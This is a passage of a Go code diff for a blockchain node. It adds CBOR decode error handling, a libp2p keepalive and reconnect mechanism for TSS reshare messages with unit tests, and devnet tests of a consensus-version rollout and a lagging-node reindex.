+// (TxInvalidOp), and callRcLimit falls back to the minimum floor. Deterministic
+// on every node since op.Payload is content-addressed.
 func DecodeTxCbor(op VSCTransactionOp, input interface{}) error {
-	node, _ := cbornode.Decode(op.Payload, multihash.SHA2_256, -1)
-	jsonBytes, _ := node.MarshalJSON()
+	node, err := cbornode.Decode(op.Payload, multihash.SHA2_256, -1)
+	if err != nil || node == nil {
+		return fmt.Errorf("decode cbor op payload (type %q): %w", op.Type, err)
+	}
+	jsonBytes, err := node.MarshalJSON()
+	if err != nil {
+		return fmt.Errorf("marshal cbor op payload (type %q): %w", op.Type, err)
+	}
 
 	return json.Unmarshal(jsonBytes, input)
 }

--- a/modules/tss/p2p.go
+++ b/modules/tss/p2p.go
@@ -8,6 +8,8 @@ import (
 	"fmt"
 	"math/big"
 	"strconv"
+	"strings"
+	"sync"
 	"time"
 	"vsc-node/modules/common"
 	tss_helpers "vsc-node/modules/tss/helpers"
@@ -17,7 +19,9 @@ import (
 	pubsub "github.com/libp2p/go-libp2p-pubsub"
 	"github.com/libp2p/go-libp2p/core/network"
 	"github.com/libp2p/go-libp2p/core/peer"
+	"github.com/libp2p/go-libp2p/core/peerstore"
 	"github.com/libp2p/go-libp2p/core/protocol"
+	multiaddr "github.com/multiformats/go-multiaddr"
 	"github.com/multiformats/go-multicodec"
 	blsu "github.com/protolambda/bls12-381-util"
 )
@@ -437,10 +441,22 @@ func (tss *TssManager) SendMsg(
 		return err
 	}
 
+	// Ensure a live connection before sending. TSS reshare delivers its round
+	// messages over on-demand unicast RPC streams; between reshares these
+	// connections go idle and can be torn down by NAT idle-eviction or transport
+	// keepalive timeouts. If libp2p reports the peer as disconnected, re-dial
+	// from its announced addresses so THIS send can proceed over a fresh
+	// connection instead of failing outright. (This handles the
+	// reported-disconnected case; a half-open "Connected" connection is healed
+	// by the ClosePeer below on an idle-death send error.) Transport-only: the
+	// message bytes are unchanged.
 	if !tss.isPeerConnected(peerId) {
-		log.Warn("peer not connected",
-			"sessionId", sessionId, "to", participant.Account, "peerId", peerId.String())
-		return fmt.Errorf("peer %s not connected", peerId.String())
+		tss.reconnectPeer(context.Background(), peerId, witness.PeerAddrs)
+		if !tss.isPeerConnected(peerId) {
+			log.Warn("peer not connected",
+				"sessionId", sessionId, "to", participant.Account, "peerId", peerId.String())
+			return fmt.Errorf("peer %s not connected", peerId.String())
+		}
 	}
 
 	tMsg := TMsg{
@@ -474,6 +490,22 @@ func (tss *TssManager) SendMsg(
 			"sessionId", sessionId, "from", fromAccount, "to", participant.Account,
 			"peerId", peerId.String(), "duration", duration, "err", err)
 		tss.metrics.IncrementMessageSendFailure()
+		// An unambiguous idle-death error means the connection is dead even
+		// though libp2p may briefly still report the peer as "connected"
+		// (half-open, killed by NAT idle-eviction / keepalive timeout). Evict it
+		// so it is re-established by the next keepalive pass or the pre-send
+		// reconnect above, instead of subsequent sends repeatedly failing over
+		// the same dead connection. Gated on isTransportErr (idle-death only, see
+		// there) so a live-but-busy peer's connection is never dropped — note
+		// ClosePeer is connection-wide and the reshare path does not retry
+		// individual messages. Transport-only: message bytes are unchanged, so
+		// this cannot affect the party list or the commitment CID.
+		if isTransportErr(err) {
+			if cerr := tss.p2p.Host().Network().ClosePeer(peerId); cerr != nil {
+				log.Trace("failed to evict stale peer connection",
+					"peerId", peerId.String(), "err", cerr)
+			}
+		}
 		return err
 	}
 
@@ -568,4 +600,186 @@ func (tss *TssManager) isPeerConnected(peerId peer.ID) bool {
 		log.Trace("peer connection check", "peerId", peerId.String(), "state", connState)
 	}
 	return connected
+}
+
+// parseWitnessAddrs converts a witness's announced multiaddr strings into
+// multiaddrs, skipping any that fail to parse.
+func parseWitnessAddrs(addrStrs []string) []multiaddr.Multiaddr {
+	addrs := make([]multiaddr.Multiaddr, 0, len(addrStrs))
+	for _, s := range addrStrs {
+		a, err := multiaddr.NewMultiaddr(s)
+		if err != nil {
+			continue
+		}
+		addrs = append(addrs, a)
+	}
+	return addrs
+}
+
+// isTransportErr reports whether an RPC error indicates a genuinely dead,
+// idle-killed connection. It matches ONLY libp2p's own idle-detection strings
+// ("no recent network activity", "keepalive timeout") — the exact symptoms of
+// the production half-open stalls (e.g. "stream reset: connection closed:
+// keepalive timeout", "timeout: no recent network activity"), so real coverage
+// is retained.
+//
+// It deliberately does NOT match "stream reset" / "connection closed" /
+// "canceled by remote" / "context deadline exceeded" on their own: those are
+// also produced by a LIVE-but-busy peer under resource-manager or stream-limit
+// pressure (and by our own ClosePeer). Because the caller reacts with a
+// connection-wide ClosePeer, and the reshare send path does NOT retry
+// individual messages, treating those ambiguous errors as death would evict a
+// healthy connection mid-reshare — dropping any concurrent in-flight round
+// message on it and stalling that peer for the full timeout. Narrow on purpose.
+func isTransportErr(err error) bool {
+	if err == nil {
+		return false
+	}
+	s := strings.ToLower(err.Error())
+	for _, tok := range []string{
+		"no recent network activity",
+		"keepalive timeout",
+	} {
+		if strings.Contains(s, tok) {
+			return true
+		}
+	}
+	return false
+}
+
+// reconnectPeer re-establishes a direct connection to a peer from its announced
+// addresses. The dial is bounded by both a 10s timeout and the caller's ctx so
+// it unwinds promptly on shutdown. Transport-only: it does not read or modify
+// any TSS message, party list, or commitment.
+func (tss *TssManager) reconnectPeer(ctx context.Context, peerId peer.ID, addrStrs []string) {
+	addrs := parseWitnessAddrs(addrStrs)
+	if len(addrs) == 0 {
+		return
+	}
+	tss.p2p.Peerstore().AddAddrs(peerId, addrs, peerstore.TempAddrTTL)
+	dialCtx, cancel := context.WithTimeout(ctx, 10*time.Second)
+	defer cancel()
+	if err := tss.p2p.Connect(dialCtx, peer.AddrInfo{ID: peerId, Addrs: addrs}); err != nil {
+		log.Trace("reconnect failed", "peerId", peerId.String(), "err", err)
+	}
+}
+
+// runConnectionKeepalive keeps direct libp2p connections to the other witnesses
+// warm for the lifetime of the node. TSS reshare delivers its round messages
+// over on-demand unicast RPC streams to specific peers; between reshares those
+// direct connections sit idle and are torn down by NAT idle-eviction,
+// connection-manager trimming, or transport keepalive timeouts. Ordinary block
+// production is unaffected because it rides the continuously active gossip mesh,
+// but the next reshare then fails to deliver its messages over a
+// dead-but-"Connected" stream, stalling the reshare until the connection
+// happens to be alive again. This loop is the production counterpart of the TSS
+// test harness (startPeerKeepalive + ConnManager().Protect) — the mechanism
+// that makes reshares succeed under test but which was absent in production.
+// Transport-only: it never reads or modifies party lists, btss inputs, or
+// serialized commitments.
+func (tss *TssManager) runConnectionKeepalive(ctx context.Context) {
+	const keepaliveInterval = 15 * time.Second
+	ticker := time.NewTicker(keepaliveInterval)
+	defer ticker.Stop()
+	for {
+		select {
+		case <-ctx.Done():
+			return
+		case <-ticker.C:
+			// Guard against a startup race where the p2p host is not yet
+			// initialized — P2PServer.Host() panics rather than returning nil,
+			// and an unrecovered panic in this background goroutine would crash
+			// the whole node.
+			func() {
+				defer func() {
+					if r := recover(); r != nil {
+						log.Warn("keepalive pass panicked, skipping", "panic", r)
+					}
+				}()
+				tss.warmCommitteePeers(ctx)
+			}()
+		}
+	}
+}
+
+// warmCommitteePeers protects, (re)connects, and probes every other enabled
+// witness so each direct TSS connection stays alive before the next reshare
+// needs it. Per-peer work runs concurrently so a few slow or unreachable peers
+// cannot stall warming of the healthy ones.
+func (tss *TssManager) warmCommitteePeers(ctx context.Context) {
+	self := tss.config.Get().HiveUsername
+	witnessList, err := tss.witnessDb.GetLastestWitnesses()
+	if err != nil {
+		log.Trace("keepalive: failed to list witnesses", "err", err)
+		return
+	}
+	host := tss.p2p.Host()
+	// GetLastestWitnesses returns every announcement row (height-descending),
+	// not one per account, so dedup to the latest row per account. This both
+	// cuts per-pass work (accounts re-announce many times) and evaluates each
+	// account on its most recent announcement — current peer_id / enabled state
+	// — instead of warming stale rows. We intentionally warm the full enabled
+	// witness set (no network filter): the committee is always a subset of it,
+	// and skipping a member risks reintroducing the very idle-death this fixes.
+	seen := make(map[string]bool)
+	var wg sync.WaitGroup
+	for _, w := range witnessList {
+		if w.Account == self || seen[w.Account] {
+			continue
+		}
+		seen[w.Account] = true
+		if !w.Enabled || w.PeerId == "" {
+			continue
+		}
+		peerId, err := peer.Decode(w.PeerId)
+		if err != nil {
+			continue
+		}
+		// Keep committee peers out of the connection-manager trim set.
+		tss.p2p.ConnManager().Protect(peerId, "tss-committee")
+		if addrs := parseWitnessAddrs(w.PeerAddrs); len(addrs) > 0 {
+			tss.p2p.Peerstore().AddAddrs(peerId, addrs, peerstore.TempAddrTTL)
+		}
+		wg.Add(1)
+		go func(peerId peer.ID, account string, addrStrs []string) {
+			defer wg.Done()
+			defer func() {
+				if r := recover(); r != nil {
+					log.Warn("keepalive peer task panicked", "account", account, "panic", r)
+				}
+			}()
+			if host.Network().Connectedness(peerId) != network.Connected {
+				// Re-establish a dropped connection ahead of the next reshare.
+				tss.reconnectPeer(ctx, peerId, addrStrs)
+				return
+			}
+			// Connected: send a cheap probe to generate traffic and reset
+			// NAT/transport idle timers. A failed probe is deliberately NOT
+			// treated as a dead connection — under heavy TSS load a busy peer can
+			// miss a probe while remaining reachable, and closing a live
+			// connection mid-reshare is exactly the harm we are avoiding. Genuine
+			// dead-connection eviction happens in SendMsg on a real send failure
+			// (unambiguous transport error), and libp2p's own keepalive will
+			// eventually drop a truly dead connection, after which the branch
+			// above reconnects it on the next pass.
+			if err := tss.pingPeerAlive(ctx, peerId); err != nil {
+				log.Trace("keepalive: probe failed (connection left intact)", "account", account, "err", err)
+			}
+		}(peerId, w.Account, w.PeerAddrs)
+	}
+	wg.Wait()
+}
+
+// pingPeerAlive sends a lightweight readiness RPC over the direct connection to
+// generate traffic that resets NAT / transport idle timers, keeping the
+// connection warm. It reuses the existing "ready" handler (rpc.go), which
+// replies with a cheap ack and has no side effects. The returned error is used
+// only for logging — a failed probe is deliberately not treated as a dead
+// connection (see warmCommitteePeers).
+func (tss *TssManager) pingPeerAlive(ctx context.Context, peerId peer.ID) error {
+	pingCtx, cancel := context.WithTimeout(ctx, 5*time.Second)
+	defer cancel()
+	tMsg := TMsg{Type: "ready"}
+	tRes := TRes{}
+	return tss.client.CallContext(pingCtx, peerId, "vsc.tss", "ReceiveMsg", &tMsg, &tRes)
 }

--- a/modules/tss/redial_test.go
+++ b/modules/tss/redial_test.go
@@ -1,0 +1,94 @@
+package tss
+
+import (
+	"errors"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+// TestIsTransportErr locks in the deliberately-narrow classification: only
+// libp2p's own idle-death signals ("no recent network activity", "keepalive
+// timeout") count as a dead connection worth evicting. Ambiguous errors that a
+// LIVE-but-busy peer can also emit under load must NOT classify as dead —
+// evicting on them would drop a concurrent, un-retried reshare message (the
+// regression this narrowing guards against).
+func TestIsTransportErr(t *testing.T) {
+	cases := []struct {
+		name string
+		err  string
+		want bool
+	}{
+		// Genuine idle-death — evict.
+		{"keepalive timeout", "yamux: keepalive timeout", true},
+		{"no recent network activity", "timeout: no recent network activity", true},
+		// The real production strings observed in the mainnet stall: the
+		// idle-death token is embedded in a longer message, so substring
+		// matching must still catch it.
+		{"prod stream-reset+keepalive", "msgpack decode error [pos 0]: stream reset: stream reset: connection closed: keepalive timeout", true},
+		{"prod no-recent-activity", "msgpack decode error [pos 0]: timeout: no recent network activity", true},
+		// Case-insensitivity (errors from different layers vary in casing).
+		{"uppercase", "KEEPALIVE TIMEOUT", true},
+
+		// Ambiguous — a live-but-busy peer emits these under resource-manager /
+		// stream-limit pressure. Must NOT evict.
+		{"bare stream reset", "stream reset", false},
+		{"bare connection closed", "connection closed", false},
+		{"canceled by remote", "msgpack encode error: stream reset (remote): code: 0x0: transport error: stream 5 canceled by remote with error code 0", false},
+		{"context deadline exceeded", "context deadline exceeded", false},
+		{"eof", "EOF", false},
+		{"connection refused", "dial tcp: connect: connection refused", false},
+		{"unrelated app error", "no documents in result", false},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			assert.Equal(t, tc.want, isTransportErr(errors.New(tc.err)))
+		})
+	}
+
+	// A nil error is never a transport failure.
+	assert.False(t, isTransportErr(nil))
+}
+
+// TestParseWitnessAddrs verifies announced multiaddr strings are parsed,
+// malformed entries are skipped rather than failing the whole set, and empty
+// input yields an empty (non-nil-panicking) slice.
+func TestParseWitnessAddrs(t *testing.T) {
+	t.Run("empty input", func(t *testing.T) {
+		assert.Len(t, parseWitnessAddrs(nil), 0)
+		assert.Len(t, parseWitnessAddrs([]string{}), 0)
+	})
+
+	t.Run("valid addrs parsed (real witness announce format)", func(t *testing.T) {
+		in := []string{
+			"/ip4/121.99.241.161/tcp/10720",
+			"/ip4/121.99.241.161/udp/10720/quic-v1",
+			"/ip6/2404:4400:4122:4200::1189/tcp/10720",
+		}
+		got := parseWitnessAddrs(in)
+		assert.Len(t, got, 3)
+		// Round-trips back to the same canonical strings.
+		for i, a := range got {
+			assert.Equal(t, in[i], a.String())
+		}
+	})
+
+	t.Run("malformed entries skipped, valid ones kept", func(t *testing.T) {
+		in := []string{
+			"not-a-multiaddr",
+			"/ip4/10.0.0.1/tcp/4001",
+			"",
+			"/nonsense/xyz",
+			"/ip4/10.0.0.2/udp/4001/quic-v1",
+		}
+		got := parseWitnessAddrs(in)
+		assert.Len(t, got, 2)
+		assert.Equal(t, "/ip4/10.0.0.1/tcp/4001", got[0].String())
+		assert.Equal(t, "/ip4/10.0.0.2/udp/4001/quic-v1", got[1].String())
+	})
+
+	t.Run("all malformed yields empty", func(t *testing.T) {
+		assert.Len(t, parseWitnessAddrs([]string{"bad", "worse", ""}), 0)
+	})
+}

--- a/modules/tss/tss.go
+++ b/modules/tss/tss.go
@@ -2078,6 +2078,11 @@ func (tssMgr *TssManager) Start() *promise.Promise[any] {
 	bgCtx, bgCancel := context.WithCancel(context.Background())
 	tssMgr.bgCancel = bgCancel
 
+	// Keep direct TSS connections to committee peers warm so reshare round
+	// messages are not lost over idle-killed connections (see
+	// runConnectionKeepalive in p2p.go).
+	go tssMgr.runConnectionKeepalive(bgCtx)
+
 	go func() {
 		//Every one minute
 		ticker := time.NewTicker(time.Minute)

--- a/tests/devnet/consensus_version_devnet_test.go
+++ b/tests/devnet/consensus_version_devnet_test.go
@@ -1,26 +1,31 @@
 package devnet
 
 import (
+	"fmt"
 	"os"
+	"strings"
 	"testing"
+	"time"
+
+	"vsc-node/modules/common/params"
+	systemconfig "vsc-node/modules/common/system-config"
 )
 
-// TestConsensusVersionDevnetManual is a placeholder for full-stack verification against a
-// running devnet (Docker). It does not start infrastructure by default.
+// TestConsensusVersionDevnetManual drives the multi-candidate vsc.propose_consensus_version
+// rollout end-to-end on a real docker devnet:
 //
-// Manual checklist (operators):
-//  1. Set consensusParams.recoveryMultisigAccounts and recoveryMultisigThreshold in node sysconfig.
-//  2. Broadcast vsc.recovery_suspend with required_auths satisfying M-of-N.
-//  3. Query GraphQL localNodeInfo: processing_suspended=true, consensus_version_display ends with "-p".
-//  4. Confirm offchain VSC tx submission returns "suspended" from the transaction pool.
-//  5. Broadcast vsc.recovery_require_version with the same multisig; verify processing_suspended=false
-//     and adopted version matches payload.
-//  6. Submit vsc.propose_consensus_version from a committee account; observe pending then adoption
-//     after enough witnesses announce the target triple on posting JSON.
+//  1. Pin the consensus-version floor ONE BELOW the running binary (floor 0.2, nodes
+//     run 0.3) so there is a valid higher target to propose to.
+//  2. A committee witness broadcasts vsc.propose_consensus_version targeting 0.3.
+//  3. localNodeInfo.consensus_version_proposals shows the pending candidate.
+//  4. Because every node announces 0.3 (≥80% stake-ready), the next election adopts
+//     the floor → active_consensus_line rises to 0.3 on every node.
+//  5. The election_result GC prunes the now-adopted candidate.
 //
-// Optional automated run (starts devnet — slow, needs Docker):
+// Recovery checklist (suspend / require_version) is still operator-driven — see the
+// notes below.
 //
-//	CONSENSUS_DEVNET_E2E=1 go test -v -run TestConsensusVersionDevnetManual -timeout 25m ./tests/devnet/
+//	CONSENSUS_DEVNET_E2E=1 go test -v -run TestConsensusVersionDevnetManual -timeout 30m ./tests/devnet/
 func TestConsensusVersionDevnetManual(t *testing.T) {
 	if testing.Short() {
 		t.Skip("skipping devnet consensus test in short mode")
@@ -29,5 +34,118 @@ func TestConsensusVersionDevnetManual(t *testing.T) {
 		t.Skip("set CONSENSUS_DEVNET_E2E=1 to run devnet-backed consensus checks (see doc comment)")
 	}
 
-	t.Log("CONSENSUS_DEVNET_E2E: add scripted Hive custom_json + GraphQL assertions here when multisig test keys are available in devnet harness")
+	cfg := DefaultConfig()
+	cfg.Nodes = 5
+	cfg.SkipFunding = true
+	cfg.LogLevel = "info"
+	cfg.MagiEnv = map[string]string{
+		"DEVNET_DETERMINISTIC_BLS": "1", // deterministic witness keys so genesis-elector forms a valid committee
+	}
+	// Floor pinned to 0.2 (one below the running 0.3 binary) so 0.3 is a valid
+	// propose target; short election interval to iterate epochs fast.
+	cfg.SysConfigOverrides = &systemconfig.SysConfigOverrides{
+		ConsensusParams: &params.ConsensusParams{
+			ElectionInterval:               20,
+			ConsensusVersionFloorEpoch:     1,
+			ConsensusVersionFloorMajor:     0,
+			ConsensusVersionFloorConsensus: 2,
+		},
+	}
+	if os.Getenv("DEVNET_KEEP") != "" {
+		cfg.KeepRunning = true
+	}
+
+	d, ctx := startDevnetNoKey(t, cfg, 30*time.Minute)
+
+	const proposer = "magi.test1"
+
+	// 1) Wait until the floor has settled at 0.2 and the nodes report running 0.3.
+	deadline := time.Now().Add(8 * time.Minute)
+	var line, running string
+	for time.Now().Before(deadline) {
+		var err error
+		line, running, _, err = d.ConsensusInfo(ctx, 1)
+		if err == nil && line == "0.2" && strings.HasPrefix(running, "0.3") {
+			break
+		}
+		time.Sleep(3 * time.Second)
+	}
+	if line != "0.2" || !strings.HasPrefix(running, "0.3") {
+		t.Fatalf("[cv] expected active line 0.2 with running 0.3.x, got line=%q running=%q", line, running)
+	}
+	_, epoch, err := d.LocalNodeInfo(ctx, 1)
+	if err != nil {
+		t.Fatalf("[cv] localNodeInfo: %v", err)
+	}
+	t.Logf("[cv] floor stable at 0.2, nodes run %s, epoch=%d", running, epoch)
+
+	// 2) Propose 0.3 (activation next epoch) from a committee witness. net_id omitted
+	// (empty matches any network — the handler only checks it when set).
+	payload := map[string]interface{}{
+		"major": 0, "consensus": 3, "activation_epoch": epoch + 1,
+	}
+	tx, err := d.BroadcastCustomJSON("vsc.propose_consensus_version", []string{proposer}, payload, d.cfg.InitminerWIF)
+	if err != nil {
+		t.Fatalf("[cv] broadcasting propose: %v", err)
+	}
+	t.Logf("[cv] proposed 0.3 from %s tx=%s", proposer, tx)
+
+	// 3) The candidate must show up in localNodeInfo on every node.
+	if err := pollAllNodes(cfg.Nodes, 3*time.Minute, func(node int) bool {
+		_, _, targets, e := d.ConsensusInfo(ctx, node)
+		return e == nil && containsStr(targets, "0.3")
+	}); err != nil {
+		t.Fatalf("[cv] candidate proposal not visible on all nodes: %v", err)
+	}
+	t.Log("[cv] candidate 0.3 visible on all nodes")
+
+	// 4) Floor must rise to 0.3 on every node once the readiness guard adopts it.
+	if err := pollAllNodes(cfg.Nodes, 8*time.Minute, func(node int) bool {
+		l, _, _, e := d.ConsensusInfo(ctx, node)
+		return e == nil && l == "0.3"
+	}); err != nil {
+		t.Fatalf("[cv] floor did not adopt 0.3 across all nodes: %v", err)
+	}
+	t.Log("[cv] floor adopted 0.3 on all nodes")
+
+	// 5) The adopted candidate must be garbage-collected (pruned) by the election_result handler.
+	if err := pollAllNodes(cfg.Nodes, 3*time.Minute, func(node int) bool {
+		_, _, targets, e := d.ConsensusInfo(ctx, node)
+		return e == nil && !containsStr(targets, "0.3")
+	}); err != nil {
+		t.Fatalf("[cv] adopted candidate not pruned: %v", err)
+	}
+	t.Log("[cv] SUCCESS: propose → candidate → adoption → GC, consistent across all nodes")
+}
+
+func containsStr(xs []string, want string) bool {
+	for _, x := range xs {
+		if x == want {
+			return true
+		}
+	}
+	return false
+}
+
+// pollAllNodes returns nil once pred holds for every node within timeout.
+func pollAllNodes(nodes int, timeout time.Duration, pred func(node int) bool) error {
+	deadline := time.Now().Add(timeout)
+	for {
+		all := true
+		var pending int
+		for n := 1; n <= nodes; n++ {
+			if !pred(n) {
+				all = false
+				pending = n
+				break
+			}
+		}
+		if all {
+			return nil
+		}
+		if time.Now().After(deadline) {
+			return fmt.Errorf("node-%d did not reach the expected state within %v", pending, timeout)
+		}
+		time.Sleep(3 * time.Second)
+	}
 }

--- a/tests/devnet/consensus_version_devnet_test.go
+++ b/tests/devnet/consensus_version_devnet_test.go
@@ -90,14 +90,31 @@ func TestConsensusVersionDevnetManual(t *testing.T) {
 	}
 	t.Logf("[cv] proposed 0.3 from %s tx=%s", proposer, tx)
 
-	// 3) The candidate must show up in localNodeInfo on every node.
+	// 3) The candidate must be recorded on every node. Proposal targets render via
+	// Version.Format() as the 3-component "0.3.0" (non_consensus=0), unlike
+	// active_consensus_line below which is the 2-component coordinated line "0.3".
+	//
+	// Adoption is fast: every node announces 0.3, so the proposal clears the ≥80%
+	// readiness guard and is adopted + GC'd within an election. The transient "pending
+	// candidate" state crosses each node at a slightly different time, so requiring all
+	// five to show it in one snapshot is racy. Latch per node instead: a node counts as
+	// having recorded the proposal once it EITHER shows the pending candidate OR has
+	// already advanced its floor to 0.3 (only reachable by processing the proposal). A
+	// node genuinely stuck at 0.2 that never surfaces the candidate still fails.
+	recorded := make(map[int]bool, cfg.Nodes)
 	if err := pollAllNodes(cfg.Nodes, 3*time.Minute, func(node int) bool {
-		_, _, targets, e := d.ConsensusInfo(ctx, node)
-		return e == nil && containsStr(targets, "0.3")
+		if recorded[node] {
+			return true
+		}
+		line, _, targets, e := d.ConsensusInfo(ctx, node)
+		if e == nil && (containsStr(targets, "0.3.0") || line == "0.3") {
+			recorded[node] = true
+		}
+		return recorded[node]
 	}); err != nil {
-		t.Fatalf("[cv] candidate proposal not visible on all nodes: %v", err)
+		t.Fatalf("[cv] candidate proposal never recorded on all nodes: %v", err)
 	}
-	t.Log("[cv] candidate 0.3 visible on all nodes")
+	t.Log("[cv] candidate 0.3 recorded on all nodes")
 
 	// 4) Floor must rise to 0.3 on every node once the readiness guard adopts it.
 	if err := pollAllNodes(cfg.Nodes, 8*time.Minute, func(node int) bool {
@@ -111,7 +128,7 @@ func TestConsensusVersionDevnetManual(t *testing.T) {
 	// 5) The adopted candidate must be garbage-collected (pruned) by the election_result handler.
 	if err := pollAllNodes(cfg.Nodes, 3*time.Minute, func(node int) bool {
 		_, _, targets, e := d.ConsensusInfo(ctx, node)
-		return e == nil && !containsStr(targets, "0.3")
+		return e == nil && !containsStr(targets, "0.3.0")
 	}); err != nil {
 		t.Fatalf("[cv] adopted candidate not pruned: %v", err)
 	}
@@ -148,4 +165,183 @@ func pollAllNodes(nodes int, timeout time.Duration, pred func(node int) bool) er
 		}
 		time.Sleep(3 * time.Second)
 	}
+}
+
+// pollNode returns nil once pred holds within timeout (single-node variant).
+func pollNode(node int, timeout time.Duration, pred func() bool) error {
+	deadline := time.Now().Add(timeout)
+	for {
+		if pred() {
+			return nil
+		}
+		if time.Now().After(deadline) {
+			return fmt.Errorf("node-%d did not reach the expected state within %v", node, timeout)
+		}
+		time.Sleep(3 * time.Second)
+	}
+}
+
+// TestConsensusVersionLateAdoptionReindexDevnet drives a node through a version
+// rollout while it is OFFLINE, then exercises the two restart-time code paths the
+// versioning system added:
+//
+//	Phase 1 — restart + late-adoption catch-up. Node-5 is down for the whole rollout,
+//	  the rest of the fleet adopts 0.3, and a full epoch later node-5 restarts. It ran
+//	  the 0.3 binary throughout (it was merely offline, never diverged), so it must
+//	  catch up across the adoption boundary WITHOUT a version-lag reindex. This boots
+//	  node-5 a SECOND time with a recorded processed_under_* version, which is the exact
+//	  path that used to nil-deref in DbReindex.Init (ChainActiveAt ran before the
+//	  elections collection was bound) and panic the node on every restart.
+//
+//	Phase 2 — forced laggard reindex. In a homogeneous-binary devnet the trigger never
+//	  fires naturally (every node records its own running version), so we stop node-5
+//	  and seed processed_under_consensus=2 — simulating a node that processed up to its
+//	  (now 0.3) head under 0.2 and diverged. On restart the reindex gate compares
+//	  processed 0.2 vs chain-active 0.3 at the head and full-reindexes: node-5 wipes
+//	  derived state, replays from genesis under the correct rules, and re-adopts 0.3.
+//
+//	CONSENSUS_DEVNET_E2E=1 go test -v -run TestConsensusVersionLateAdoptionReindexDevnet -timeout 45m ./tests/devnet/
+func TestConsensusVersionLateAdoptionReindexDevnet(t *testing.T) {
+	if testing.Short() {
+		t.Skip("skipping devnet consensus test in short mode")
+	}
+	if os.Getenv("CONSENSUS_DEVNET_E2E") == "" {
+		t.Skip("set CONSENSUS_DEVNET_E2E=1 to run devnet-backed consensus checks (see doc comment)")
+	}
+
+	cfg := DefaultConfig()
+	cfg.Nodes = 5
+	cfg.SkipFunding = true
+	cfg.LogLevel = "info"
+	cfg.MagiEnv = map[string]string{
+		"DEVNET_DETERMINISTIC_BLS": "1",
+	}
+	// Floor pinned to 0.2 (one below the running 0.3 binary) so 0.3 is a valid
+	// propose target; short election interval to iterate epochs fast.
+	cfg.SysConfigOverrides = &systemconfig.SysConfigOverrides{
+		ConsensusParams: &params.ConsensusParams{
+			ElectionInterval:               20,
+			ConsensusVersionFloorEpoch:     1,
+			ConsensusVersionFloorMajor:     0,
+			ConsensusVersionFloorConsensus: 2,
+		},
+	}
+	if os.Getenv("DEVNET_KEEP") != "" {
+		cfg.KeepRunning = true
+	}
+
+	d, ctx := startDevnetNoKey(t, cfg, 45*time.Minute)
+
+	const proposer = "magi.test1"
+	const downNode = 5 // magi.test5 — its announced 0.3 version stays counted while offline
+
+	// 1) Floor settled at 0.2 with nodes running 0.3.
+	deadline := time.Now().Add(8 * time.Minute)
+	var line, running string
+	for time.Now().Before(deadline) {
+		var err error
+		line, running, _, err = d.ConsensusInfo(ctx, 1)
+		if err == nil && line == "0.2" && strings.HasPrefix(running, "0.3") {
+			break
+		}
+		time.Sleep(3 * time.Second)
+	}
+	if line != "0.2" || !strings.HasPrefix(running, "0.3") {
+		t.Fatalf("[cv] expected active line 0.2 with running 0.3.x, got line=%q running=%q", line, running)
+	}
+	t.Logf("[cv] floor stable at 0.2, nodes run %s", running)
+
+	// 2) Take node-5 down for the whole rollout (the late adopter).
+	if err := d.StopNode(ctx, downNode); err != nil {
+		t.Fatalf("[cv] stopping node-%d: %v", downNode, err)
+	}
+	t.Logf("[cv] node-%d stopped before rollout", downNode)
+
+	// 3) Propose 0.3 from a committee witness. activation_epoch 0 → the handler defaults
+	// it to the next epoch at processing time, dodging a read-vs-land epoch race.
+	payload := map[string]interface{}{"major": 0, "consensus": 3, "activation_epoch": 0}
+	if _, err := d.BroadcastCustomJSON("vsc.propose_consensus_version", []string{proposer}, payload, d.cfg.InitminerWIF); err != nil {
+		t.Fatalf("[cv] broadcasting propose: %v", err)
+	}
+	t.Logf("[cv] proposed 0.3 from %s (node-%d offline)", proposer, downNode)
+
+	// 4) The remaining fleet (nodes 1-4) adopts 0.3.
+	if err := pollAllNodes(4, 8*time.Minute, func(node int) bool {
+		l, _, _, e := d.ConsensusInfo(ctx, node)
+		return e == nil && l == "0.3"
+	}); err != nil {
+		t.Fatalf("[cv] online fleet did not adopt 0.3: %v", err)
+	}
+	_, adoptEpoch, err := d.LocalNodeInfo(ctx, 1)
+	if err != nil {
+		t.Fatalf("[cv] localNodeInfo: %v", err)
+	}
+	t.Logf("[cv] online fleet adopted 0.3 at epoch %d", adoptEpoch)
+
+	// 5) Wait a full epoch past adoption so node-5 comes back clearly behind.
+	if err := pollNode(1, 6*time.Minute, func() bool {
+		_, ep, e := d.LocalNodeInfo(ctx, 1)
+		return e == nil && ep >= adoptEpoch+1
+	}); err != nil {
+		t.Fatalf("[cv] fleet did not advance a full epoch past adoption: %v", err)
+	}
+
+	// ── Phase 1: restart node-5 and catch up across the adoption boundary ──
+	if err := d.StartNode(ctx, downNode); err != nil {
+		t.Fatalf("[cv] restarting node-%d: %v", downNode, err)
+	}
+	t.Logf("[cv] node-%d restarted (late adopter)", downNode)
+
+	if err := pollNode(downNode, 10*time.Minute, func() bool {
+		l, _, _, e := d.ConsensusInfo(ctx, downNode)
+		return e == nil && l == "0.3"
+	}); err != nil {
+		t.Fatalf("[cv] node-%d did not catch up to floor 0.3 after restart: %v", downNode, err)
+	}
+	// It never diverged (ran 0.3 throughout), so the catch-up must NOT be a reindex.
+	if logs, lerr := d.Logs(ctx, fmt.Sprintf("magi-%d", downNode)); lerr == nil &&
+		strings.Contains(logs, "consensus-version lag") {
+		t.Fatalf("[cv] node-%d unexpectedly version-lag-reindexed on a plain offline catch-up", downNode)
+	}
+	t.Logf("[cv] PHASE 1 ok: node-%d restarted and caught up to 0.3 without a reindex", downNode)
+
+	// ── Phase 2: simulate a 0.2 laggard and force the version-lag reindex ──
+	if err := d.StopNode(ctx, downNode); err != nil {
+		t.Fatalf("[cv] stopping node-%d for seed: %v", downNode, err)
+	}
+	preBlock, err := d.getLastProcessedBlock(ctx, downNode)
+	if err != nil {
+		t.Fatalf("[cv] reading node-%d last_processed_block: %v", downNode, err)
+	}
+	if err := d.seedProcessedUnderVersion(ctx, downNode, 0, 2); err != nil {
+		t.Fatalf("[cv] seeding processed_under version: %v", err)
+	}
+	t.Logf("[cv] node-%d head at block %d tagged processed-under 0.2 (chain-active is 0.3)", downNode, preBlock)
+
+	if err := d.StartNode(ctx, downNode); err != nil {
+		t.Fatalf("[cv] restarting node-%d after seed: %v", downNode, err)
+	}
+
+	// 8) The version-lag full reindex must fire.
+	if err := pollNode(downNode, 5*time.Minute, func() bool {
+		logs, e := d.Logs(ctx, fmt.Sprintf("magi-%d", downNode))
+		return e == nil && strings.Contains(logs, "consensus-version lag")
